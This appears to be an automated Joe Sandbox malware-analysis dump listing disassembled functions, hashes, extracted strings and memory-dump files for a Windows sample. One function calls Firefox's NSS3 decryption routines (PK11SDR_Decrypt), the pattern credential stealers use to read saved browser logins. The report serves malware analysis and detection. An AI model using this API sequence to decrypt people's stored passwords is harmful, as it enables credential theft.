Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 36d3b83afa8ba159f8052800831299ca9278c1baaffa7c1a7c2f9b004f2fb17b
Instruction ID: 27967dbe976c505c8401c0ad4ccf3ba9af0cd0eab3e817d35481bb2a8c82c4ca
Opcode Fuzzy Hash: 36d3b83afa8ba159f8052800831299ca9278c1baaffa7c1a7c2f9b004f2fb17b
Instruction Fuzzy Hash: DFF190719101189AEB59FB64CC95AEE7338FF15300F8441E9A41BA2991EF346F8ACF53

Function 00C57629 Relevance: 14.1, Strings: 10, Instructions: 1617COMMON

Download Yara Rule

Strings

D,~, xrefs: 00C587EF
3I#Y, xrefs: 00C57CF7
g8, xrefs: 00C57DDA
' [{, xrefs: 00C588D0
zc}, xrefs: 00C57A7F
0x;], xrefs: 00C57DE0
zN, xrefs: 00C579A2
;-m, xrefs: 00C588E9
b=8, xrefs: 00C57DC5
n|G*, xrefs: 00C5860D

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ' [{$0x;]$3I#Y$;-m$D,~$n|G*$zc}$b=8$zN$g8
API String ID: 0-2654356029
Opcode ID: eb6d6d7e19bb1318e8c4b2af2db87a461bb405372d936ae3803952b2041963fa
Instruction ID: 4a3977a8b4744f5b5529e4d1989891976c208962f94f3aa138600cd06f57c0d5
Opcode Fuzzy Hash: eb6d6d7e19bb1318e8c4b2af2db87a461bb405372d936ae3803952b2041963fa
Instruction Fuzzy Hash: 2EB2F6F360C204AFE704AE2DEC8577AB7E9EB94320F1A893DE6C4C3744E67558058697

Function 0089C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0089C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0089C87C
PK11_GetInternalKeySlot.NSS3 ref: 0089C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0089C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0089C8EB
lstrcat.KERNEL32(?,008B0B46), ref: 0089C943
lstrcat.KERNEL32(?,008B0B47), ref: 0089C957
PK11_FreeSlot.NSS3(?), ref: 0089C961
lstrcat.KERNEL32(?,008B0B4E), ref: 0089C978

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: b0fd0130bef8b68f70383f122e5c8cfa88f497a0b364ba27f93500aa9dcadbff
Instruction ID: d62f0c83f1bb96fc29152313a36d631e1dcd13023c1be0e6469ff4318665e6b9
Opcode Fuzzy Hash: b0fd0130bef8b68f70383f122e5c8cfa88f497a0b364ba27f93500aa9dcadbff
Instruction Fuzzy Hash: 8541AD7590021ADFCB10DFA4CC89BEEBBB8FB48304F1041A9E50AA7280D7759B85CF91

Function 6C6A2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6A2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6A2C61

Part of subcall function 6C654DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
Part of subcall function 6C654DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6A2E2D

Part of subcall function 6C6681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6681DE

Strings

expected a Time entry, xrefs: 6C6A2E36
ProfileBuffer parse error: %s, xrefs: 6C6A2E3B
(root), xrefs: 6C6A354F

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction ID: c45b159c50666698707fa0529ec4367b72d96f9d0c3f7e5a65ee094248517380
Opcode Fuzzy Hash: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction Fuzzy Hash: 4191CF706087408FC724DF65C48469EF7E1AFCA358F10492DE99A8B751DB30E94ACB5B

Function 6C65D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

-, xrefs: 6C65D7DD
0, xrefs: 6C65D852
@, xrefs: 6C65DAF6
, xrefs: 6C65DA88
0, xrefs: 6C65DC7F
9, xrefs: 6C65DE7F
8, xrefs: 6C65DC08
1, xrefs: 6C65DBDD

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction ID: 0aa39ac45e123d66a3a14887cae5e2a87215a2a65c9adc49dc6c57d26949dd6f
Opcode Fuzzy Hash: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction Fuzzy Hash: A262CF7060C3458FD701CF19C69079ABBF2AF86358FB84A0DE4D54BAD1C33599A5CB8A

Function 6C6C545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C8A4B

Strings

~qel, xrefs: 6C6C9269, 6C6C5703, 6C6C921F, 6C6C56C7, 6C6C5740, 6C6C9459, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 01af520261224d43aa745bc0de72f0653f0550fdd9b9ffcc5ee0159283b6d2d5
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 0BB1F772F0021A8FDB24CF68CC907E9B7B2EF85318F1802AAC549DB791D7349985CB95

Function 6C6C542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6C925C

Strings

~qel, xrefs: 6C6C9269, 6C6C5703, 6C6C921F, 6C6C56C7, 6C6C5740, 6C6C9459, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 847e3582a78b901618d98ce7101b713317aa8019d6372db2b3185b55660006ee
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: ABB1E572F0420A8BCB14CE58CC816EDB7B2EF85314F14426AC949DB795D734A989CB95

Function 00C59101 Relevance: 9.2, Strings: 6, Instructions: 1698COMMON

Download Yara Rule

Strings

arsC, xrefs: 00C5A1D1
0cn, xrefs: 00C59196
44o, xrefs: 00C597F8
0tu?, xrefs: 00C59BD8
-.z?, xrefs: 00C5A30F
@0[#, xrefs: 00C591D3

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0cn$-.z?$0tu?$44o$@0[#$arsC
API String ID: 0-23630299
Opcode ID: 0c97a5909039802508a07812919303ae8923f8e84b0445373103bdd4232a6c66
Instruction ID: 1677b18ae7d2a7581f61963676fd1a287235a8eb9e6719ca17216515f1380532
Opcode Fuzzy Hash: 0c97a5909039802508a07812919303ae8923f8e84b0445373103bdd4232a6c66
Instruction Fuzzy Hash: 1AB24BF3A0C210AFE3046E2DEC8577AB7D9EF94320F1A453EE6C5D7744EA3558058692

Function 00C540E9 Relevance: 7.9, Strings: 5, Instructions: 1647COMMON

Download Yara Rule

Strings

ql?}, xrefs: 00C546B2
&3oM, xrefs: 00C54A17
8Y_, xrefs: 00C54F42
qnJ, xrefs: 00C55187
%5w, xrefs: 00C55380

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %5w$&3oM$ql?}$qnJ$8Y_
API String ID: 0-3966523625
Opcode ID: 4755b93f1c101509fe49ba2e240cb83010f9afdf186400ba43293efe974d37f7
Instruction ID: 7aaf3d912722289dcbcee0e2923cadbc2e2c9e6ef70dbe41723c022bca2c316c
Opcode Fuzzy Hash: 4755b93f1c101509fe49ba2e240cb83010f9afdf186400ba43293efe974d37f7
Instruction Fuzzy Hash: C3B2F8F360C204AFE704AE29EC85B7BBBE9EB94720F16453DEAC5C3740E63558058697

Function 00C5E018 Relevance: 7.8, Strings: 5, Instructions: 1581COMMON

Download Yara Rule

Strings

Y#sw, xrefs: 00C5E766
,j]6, xrefs: 00C5E48D
%?~, xrefs: 00C5E983
9MMz, xrefs: 00C5F111
9,X], xrefs: 00C5F254

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %?~$,j]6$9,X]$9MMz$Y#sw
API String ID: 0-2730559119
Opcode ID: 9778f861e990821b821e2b04d9fe84d1239ec5088093697582f5c216990b3d2e
Instruction ID: 2b047fa20eab3938139950444ada0290dad6b2e07e4bc99ec799bbfcf1dbe483
Opcode Fuzzy Hash: 9778f861e990821b821e2b04d9fe84d1239ec5088093697582f5c216990b3d2e
Instruction Fuzzy Hash: 2AB2E2F360C604AFE3046E29EC8567AFBE9EF98720F16493DE6C4C3740E63558458A97

Function 00C5FA6E Relevance: 7.8, Strings: 5, Instructions: 1525COMMON

Download Yara Rule

Strings

2{z, xrefs: 00C5FF2D
?Km, xrefs: 00C603CD
xhGQ, xrefs: 00C606F7
6\~, xrefs: 00C5FB78
m7}=, xrefs: 00C5FD42

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
